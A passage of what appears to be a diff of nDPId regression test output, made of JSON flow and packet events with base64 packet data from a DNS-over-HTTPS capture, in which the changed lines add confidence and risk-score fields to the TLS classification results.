haAOIYehc8T\/qnYYgS+NN4PGwZ62L8NBcloKk78UBZkehMmgkPB4R4UGWU+P\/9wBXoct8xHeSEI\/RKypAvQONIxcx+PGOfY7cug8EawYjQxeC0dBrCPA4HuTbflrjLpxCEjs2nsPD4SXJGGl7AoG4paGMGZjt4DcZO2jhWz5unIehkjqEM\/fAASWMIIEkjCCA3qgAwIBAgIQCgFBQgAAAVOFc2oLheynCDANBgkqhkiG9w0BAQsFADA\/MSQwIgYDVQQKExtEaWdpdGFsIFNpZ25hdHVyZSBUcnVzdCBDby4xFzAVBgNVBAMTDkRTVCBSb290IENBIFgzMB4XDTE2MDMxNzE2NDA0NloXDTIxMDMxNzE2NDA0NlowSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnNMM8FrlLke3cl03g7NoYzDq1zUmGSXhvb418XCSL7e4S0EFq6meNQhY7LEqxGiHC6PjdeTm86dicbp5gWAf15Gan\/PQeGdxyGkOlZHP\/uaZ6WA8SMx+yk13EiSdRxta67nsHjcAHJyse6cF6s5K671B5TaYucv9bTyWaN8jKkKQDIZ0Z8h\/pZq4UmEUEz9l6YKHy9v6Dlb2honzhT+Xhq+w3Brvaw2VFn3EK6BlspkENnWAa6xK8xuQSXgvopZPKiAlKQTGdMDQMc2PMTiVFrqoM7hD8bEfwzB\/onkxEz0tNvjj\/PIzark5McWvxI0NHWQWM6r6hCm21AvA2H3DkwIDAQABo4IBfTCCAXkwEgYDVR0TAQH\/BAgwBgEB\/wIBADAOBgNVHQ8BAf8EBAMCAYYwfwYIKwYBBQUHAQEEczBxMDIGCCsGAQUFBzABhiZodHRwOi8vaXNyZy50cnVzdGlkLm9jc3AuaWRlbnRydXN0LmNvbTA7BggrBgEFBQcwAoYvaHR0cDovL2FwcHMuaWRlbnRydXN0LmNvbS9yb290cy9kc3Ryb290Y2F4My5wN2MwHwYDVR0jBBgwFoAUxKexpHsscfrb4UuQdf\/EFWCFiRAwVAYDVR0gBE0wSzAIBgZngQwBAgEwPwYLKwYBBAGC3xMBAQEwMDAuBggrBgEFBQcCARYiaHR0cDovL2Nwcy5yb290LXgxLmxldHNlbmNyeXB0Lm9yZzA8BgNVHR8ENTAzMDGgL6AthitodHRwOi8vY3JsLmlkZW50cnVzdC5jb20vRFNUUk9PVENBWDNDUkwuY3JsMB0GA1UdDgQWBBSoSmpjBH3duubRObemRWXv86jsoTANBgkqhkiG9w0BAQsFAAOCAQEA3TPXEfNjWDjdGBX7CVW+dla5cEilaUcne8IkCJLxWh9KEik3JHRRHGJouM2VcGfl96S8TihRzZvoroed6ti6WqEBmtzw3Wodatg+VyOeph4EYpr\/1wXKtx8\/wApIvJSwtmVi4MFU5aMqrSDE6ea73Mj2tcMyo5jMd6jmeWUHK8so\/joWUoHOUgwuX4Po1QYz+3dszkDqMp4fklxBwXRsW10KXzPMTZ+sOPAveyxindmjkW8lGy+QsRlGPfZ+G6Z6h7mjem0Y+iWlkYcV4PIWL1iwBi8saCbGS5jN2p8M+X+Q7UNKEkROb3N6KOqkqm57TH2H3eDJAkSnh6\/DNFu0QhYDAwFNDAABSQMAF0EE7OwduzycCFyh5foVYUYJfj2csLLoqbmNrs4ksDiqkMaHC2NulFxfST4jcCRZ19YEaLojL5JVRvlluRb8LA6yDQQBAQARbpzNdpCTfHNn9Bz14lNKRHZrsXa4X4EmfyVVEagU6WSCW5UKp3bMis8UAzosg4RFbcIE\/BqKgmQG64Bt\/cGitnxq47bonIC\/OFLylrM320R6R6uLkQuGNQpkUlgrZKL\/+YkYqd4ToLlZjenqQeguYlPWOUvDEduCfvOd+A9y2fcGuSyrbb0En99qwYiK1PUm11WXjEDQ91vzKm5Pz2wWWFYuywvRbHOtLetuqGEfMtz5QTTP+GA2fJf1SHhqAtT7v7XaP+5Wvee65IgIoNU6aiAVYz3hwW\/AkDmTqCcqZ608Q7A+R1MIFZgfnWqkxiaXPHcpFh\/8pcgjckhLtTiSFgMDAAQOAAAA"}
-01169{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310980,"flow_last_seen":946739311016,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":3284,"flow_avg_l4_payload_len":1642,"midstream":1,"ts_msec":946739311016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9":"TLS Expired Certificate"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","server_names":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=odvr.nic.cz","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"15:57:4E:06:5B:3D:23:22:EF:BC:2E:5B:A3:3E:A5:76:BD:14:01:4B"}}
+01276{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310980,"flow_last_seen":946739311016,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":3284,"flow_avg_l4_payload_len":1642,"midstream":1,"ts_msec":946739311016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","server_names":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=odvr.nic.cz","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"15:57:4E:06:5B:3D:23:22:EF:BC:2E:5B:A3:3E:A5:76:BD:14:01:4B"}}
 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":946739311048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"ts_msec":946739311048,"pkt":"REREREREZmZmZmZmCABFAACmYCJAAL0GXEYKAAABuSuHAZUqAburhClHMeSxCFAYAfUBggAAFgMDAEYQAABCQQS+L1tdhkv27psDloITDJmmm+nkuKGJ6kBYeGBEdwUOSK4polbbfA55gXHwNtK3Y1Aq1CUhl++X\/zqhOD+IGqi8FAMDAAEBFgMDACgAAAAAAAAAALayQyzNIxhtoOFefQYzbs\/rDW3NZGb\/HW2xO7qHfaVY"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00837{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946739311335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"ts_msec":946739311335,"pkt":"REREREREZmZmZmZmCABFAAFF8W5AAL0G+HQKAAABCQkJCso6Abuxr7nkL4f0JVAYAfbUBgAAFgMBARgBAAEUAwN330DAziY7Qy75ow2vvPPweI0WjrfNmIygzjgDJAOaiiBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AICW+8u6SZcrHjrKSceEpWhhd\/sXKRaui0Qq2OMNRWOwf"}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":946739311357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"ts_msec":946739311357,"pkt":"ZmZmZmZmRERERERECABFAAXUEqtAADsGVKoJCQkKCgAAAQG7yjovh\/Qlsa+7AVAQAHdneAAAFgMDAHoCAAB2AwPsHFeUVovCXmWpA4VyNoqF1JeqKqRwRROYqOPJU94DoSBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3hMCAAAuACsAAgMEADMAJAAdACBGm95D7Gx83XoeinRk1rxGpZA8u1buvy6HtAvs0UM2ZxQDAwABARcDAwAgBCGr5NOssVZ7TUX4BrL7MyB6aRLwiu1feUb2m7o8fLYXAwMKaD942IoOSpCliO6ZHVfN+ruurWUvz7jYgeJjK7SV5aPdpOPU+gCK34wDZjZp50dMaIsg77NAx4MrmJU6wTsTAwZldztvUMpws2wEYMHKWN686r\/ZugmuzBYB3tOPhjCMvk8pBO5Z4lVJQc9Hb1RsJ03QnqO\/EjZsCDIJr3EwAdBfauIjY3hi6AzlRf9VL9JoUREwghpYtzQDH4RvKScS6ISuIZ0qtqLTaSpG1rQC+HJZ6KKhTxZKSTcym6aIqvAR7ZiyINnXnDnxtWbl8cRiOiDv8PdDsr+5E5xwhcf6QYoUCBscXYYl1EwqfCWZLU9EdSEHvyBTgkaNAt3XMqrEl7x4wjZ94SWxkiQsQ3IyHj5ooHHdJLNgfAhAZ1sF3MqWOMepm6yBmJwKpSpxHS0\/\/oYNPpH+52R4vidTCtKs7UfIN9SKrOu0JFbGVqc8M5lplCXOQx4+S48+BecP0sGtTkcShvyBVSAANiwxQTDnS7JinVgGYtRwWjEqrWQJJopko6YuGLn+wkhYZkogv\/onHZtE4hlsg01xAHJ9PxQYxWbOdVfS1w0JvhE5EDMILwTMYm\/YfzaRcfZnN3X3c8PldLUC8Q00rxaePA+7a5mbMlVzZ\/ZKqlpmGHRhU3G\/b+Za7F3XZpTKcWJ\/+pP4OAaUaey+j0NOSrl7D3\/HeWq7P0vSd\/KYIm9oS0ZJvLtsffCfxTm2zwDcPGhRfKW16iadTUvmoczzCHSYvw+n8hl61iMBIgJerq\/CN9KkicrNEfU8QCR9bMF1D3CABgNImMdCKODlAcrpb\/Ya\/cQUwfP\/CWuVsZ3s+sh12SEW9JLfAgHTnuYwcMjbvAf2Fgpb\/+WmXCT93+A3gLKANXIVA2PfvntvndGO4gXYEiHaUhu4qZSsHkkcQJ5rwvJrE4CSJC\/fp+te7FlAxBXZxU3peCLLIMzIhccFKuqNX9+cPYxqAzm+f4FDsJg5KvH5AIh6Nda\/JBKZzhlz2omWzUxsNRCyzYkCR\/6xx8emByUElOOQjp3\/HRm+WaL5aZHnOk2myD86PdWR0IdZibdlJEHJ2\/GXJsQQv95dhA35hvgjWHiQLe0QLkAtPzosLXULXc5d7ytqMATetgFrOl+B+IuaEJAtm5NdT9m+\/Uo1nl\/TbvSaNp5EaxK2DPhV7Vt+vxmsBj23m0aDhv8PPgUfy9wK\/Niqob3bOD6oQrofsTggzpDg\/0PeQx+LRnGU46v4ljhYI4JoQY+cJBFQKWNeFww9uy1s8SJhz9LzcLFv+j30Vt+r4FFm8AZfzHX3wSuBELuShY7dZHSjQzxqOJfeGLr5ThoXw5ldv54ifSY52Lfxp8BkElu7BDDbf4F6XdVR3aRKy8Yk7ooQevFc0GOsxn7jXeMuFiaf9M\/MspabzWIKD5sTaMPvexVqQrSIhAE01MVqTa8zAs1n4D9AszPAZaArvvaw1dpUAGCn22YGrLkylRxMCN07\/HyOXir6cpxUbsvRgSag8LgIuYbY\/Ta1KZ2trDeXprvYofOqOqX\/ep4LHzQHiCFm14LvDzSoMa4qqUdxfJfOjiZQVsJdT+2uThs188toZRMoZsziXxP++fZpO4m\/wGTJ13ciJYHkQjnaWtFJW9KHR4pPyXX3T1W5XcomUZpNi+tnQlSKiXPl02KPyhw0qdY8Z0WoKV536f3wtH00HuTa3UIk1hZxDmxFcYOKvSwc"}
-00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311335,"flow_last_seen":946739311357,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1737,"flow_avg_l4_payload_len":868,"midstream":1,"ts_msec":946739311357,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311335,"flow_last_seen":946739311357,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1737,"flow_avg_l4_payload_len":868,"midstream":1,"ts_msec":946739311357,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":946739311358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1616,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1616,"pkt_l4_len":1582,"ts_msec":946739311358,"pkt":"ZmZmZmZmRERERERECABFAAZCEqxAADsGVDsJCQkKCgAAAQG7yjovh\/nRsa+7AVAYAHfZAwAA1xiWPE9sRZ+HRED66TQP2BK\/H\/\/55yXpchOqptSfdmizDwWdekTWC4fynK8Z2sZPt7VLeiJJja8C3BQX9Rz0xZnn1eoThbbJA0Ru7pA+5J7tyanMo4IQcPUIBSO5p49Bymfzm29G5qjErMG7mQ0OPPjTCRaB\/UjgjbKvSEcd8\/qlBT71ZfI4uv2myCBr7kstCCXPIR18CKF+Z2\/VrH6vxRdx\/DMaAsMgc41PzNU7xNOukRDZxOR62YLQKe5TOm9eGAE6qQfGiWVQuBPTBNCMLbyMtxxnLWSXpHUM8lAFCuaK7Kc6QBacccBEf2G6WUxZTWFo3b0bLTLXGsaAdMgEEvX57cRGL6Gq8YWmgloFc0L4YPSBPg4QXqG2603cgV+j6PlTHv6e2HefSTdXdeLXiPRCN345+9Y7w0ERX6leOOccKhVG5SuGrnMow7zmCn7a2KZDo6IK6nPbbrDUtvAROe\/2qAE2VCX9KID9EijWEziQ9XCbVPjeL02DA\/rYN7wYXRiJgCIeBs3cXR7OygqBY2+3+XFzo9TaLSJOjL2D0foR73wSCVhYWptmpzwaIHjhZCo4rI5hdLdI5wijBOAwhmr7WRW8Yv8AQsnvt1Z4coLNvTRubKzb6tX\/Oxf2jOtE8ql46ReYSM8F\/WAKChrNRMIbb1FxJ7q10gZXMDttRcPXX\/qGmHUzaGCJmbtVGS68jgVwThCO60XMMu84lvsX\/Ppf9SgVkWGycwU0+7rBExjec94Gk2PRYtyBh7FtK\/ojKF2Zx1IbH4Ped7sLfGR4i7sMPLWNn+T5wJpId2IpurmzQEup+Wmo7GS+GCV0scp4nxOFT1awumcjwSZT8bYpF93Gq1VRsPaw1Ed8OHX5e5gmoY4MVzie+NT9SEgMn6ichQsu5snHAMbc8\/IWQxw1j4WN38V6zcIh4u4V1Gd7SkhAHeYNQaHO8zyvvE8ImQNU3iYNHLIKvw9jrqWUBqp23GQnf3jir7+jnbT6O6iTPLexjWoZTCF\/FtolEJ0e895tZWyhQDvFKtQE5PBsOvi7\/BalOF7pvRKDn\/re0ni0oWgQPdEaU+LIaPzCC8LkWYd5oE27150iJxzh1Gp8SiKQXDLhLhi579hHj1+ols2JqJH8RdJfR0+VmnJeuW7LLf+BRMSJBXoQCCLgwxC7f\/h7fFu2xKC0W6c42fJZaQRckgm7zcULCvbrdB3\/7TiSzFX4IqscHoIIazQksB3SnhTuJmLtEq0s5iQGUGxfhlMGhmMgzukQ6S3xziGVGLlkCIIbeLTBQrX9TXDN8S1GsZEFqBjMPt\/N1zN3ViQ2J2at2dPSgSFskYDCKI7W279fwmbZs7V8tsMKdl7zI9bVkSm8TK+VOCU7uRHndZTCFD0rVG1nulq\/L99PnlHGAGXK\/CqGETUVVLlDxaOxEAgpjONuItzxylFN2ddXgvj3hTCiDE8O0ZeY5HxF3kaLieLFjiKlcFdLwH+yoWIasdZ5ETRJVqr26OzVYBTCPTfSgbwHD0EdFC3v31MUjg04ocQ4ZiFf7dRFVtWmOWN0r2SpHXy2xEBvMuqeP3vQyXuuz6g6Dn7YZmJY0+sx4Fy9C8oBJAE0ZwKxguZmJv1GeQHP6tU\/veMnBxdJr3tx5OgYDk+909nj4a5TD3cRR1pqKY8PwvBnQ1a7o21Mx6az\/nj775\/EQh2soovj6zthqPP\/vtXFBBG3tG\/sEPeFuYX44cpRhz5K3N4JqP6Lp6W3KZYJ1EwmXdPWiQcbK\/K0dzC4LCmApJnMsipnxLFAxIsyZnv1pRKdZtp6E4ZNkwItTRiePKudtegvLH1+qbg3pXvAj\/AueIMUCY+nZ2bEiLI67RcDAwBgsXSJyFgjJRWpsUIwFa+B3HudQHKrExr60U8JLlKkL\/P\/S+PEy7whFdA90+7WJF1F8DCmOjyvxxrrWdZx35m5pHvRkiSavCeWDYlRzcWBeiUF0TAz0e0CdFpMI0nfm+C5FwMDAEXIcqRX1+3I4YBN1ZyTwBh\/\/IzIU5lJHrJKAnGrUu2ocpCQI2eEwS+zVK0zKk1o2WUWMhhsV2wCrUmzne3qZHF1rWYeRVk="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00837{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946739311566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"ts_msec":946739311566,"pkt":"REREREREZmZmZmZmCABFAAFFTLFAAL0GMYcKAAABuYbEN9gaAbsU0wRrjALq7FAYAfY\/sgAAFgMBARgBAAEUAwN53D+IdbyKMqUcdChlG3BH1byG6PSts1pdzll38jdueyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIASid2tq+mdmASZBUTGU5iyt2F1JUvrNCp22BxrDleoO"}
-00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04381{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":946739311603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"ts_msec":946739311603,"pkt":"ZmZmZmZmRERERERECABFAAuAg39AADQGeX65hsQ3CgAAAQG72BqMAursFNMFiFAQAfVJ7QAAFgMDAHoCAAB2AwNkY5ffptLk\/1RQxoHPHysW3r9+0ddQo4Z3YjqxuStqKyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhxMCAAAuACsAAgMEADMAJAAdACDs3oZu6oN3lGaq4ly6\/hAqFwB\/djty35eYhaI2Lxe7SRQDAwABARcDAwAgv82VBnjlaTkDEuDhSukFo4HH4nI6fax\/zFPW2XozJ0kXAwMOr9L3WKPFCRevhqaVGoGS+x\/kXxxMckfNoOqk04UOi2nffzkls4dz\/6PwTgD2O+tiYezNJxr\/6WpHVX82B1TCh5LVuQtfmobZqrhUuztxfuDnZpjdtqBFN8\/ThU4OUKCLhdBohaEJUJaODtpSPbvHLMo+XUoovzoT0\/zM8eQTXQpCXzBBMJx7xHTAsbkvGn3C+AG5zWAlrqlt8rw8cJvpcKk420r2AjCbqQCcOhIk9fgtrE6sGQpDmvb1eDYkMJL0ZWhtJpArnw4DJbVlN2eqshODC2oEeU4LRs6HxumiPK1q9BAYm9j4B\/VQvljlxD1l2D54nI0XTtCqzYVH05VeNSyKwY99P0gfk5KbNuwMkg76KjoZ0pANDmDoK2O7MRcalHkbOzBtmCZzhD7k0YW7eqNkMU5wTjhw6\/SKqF25gZNB9Nt6RXkKo6zhp67SL4jpzGRuSRzfeNfXwE70s6GkDEHT87ePp0CPZwkccES0koYuFCUJ8ZPaF51CsuO3hEK6HLj90BijpqZSqxhfc1mm\/yqD3lLZlsT6EnUdCBK75PQ4LqFtNj1aZVWZmY0bISdBsjTgcU\/azUhlVpbtuwFzbRgeZMjYItDFV3G2Mz1lBTIG8+EI15TAfiX3THktTEDNdXWRIKZWc6CdSZSTQj5epKSMIDeZ3ym23Y5D0uYv2rRWwF77WpaBXG+MUxbpeWleGLZxmojsUrhsTN3K\/SO4YTnIH3mEDcbuEL\/C6kXZUUc3JKUkSmGmNO61dgMehbma4fB8llee+ia3ZxrMWwvGiTS2tpm78Rjdk2lVGQ4Kw0Hv16lr+xG8BLc4CMV63wU9gsM8SvlR14rXUIcZ1w1IVKRMCPj5\/ktzqCSdsd7JLAu6iqnF+tffAp0R7hABno4kl79WtkvKmhCxs2C9rHaxhWuglRBec9Q1dOU4n\/q5s3oTaT0MWOiB9FA9hPVkcr5rHO5WTaUTZCO3f07agWWupUC0SrT4kMq2F7GC\/qyJUokz54psYmDyksoYU5W4XunHAPWif32UI8qTU8ZnD9BGfH74hn454rDYVO6L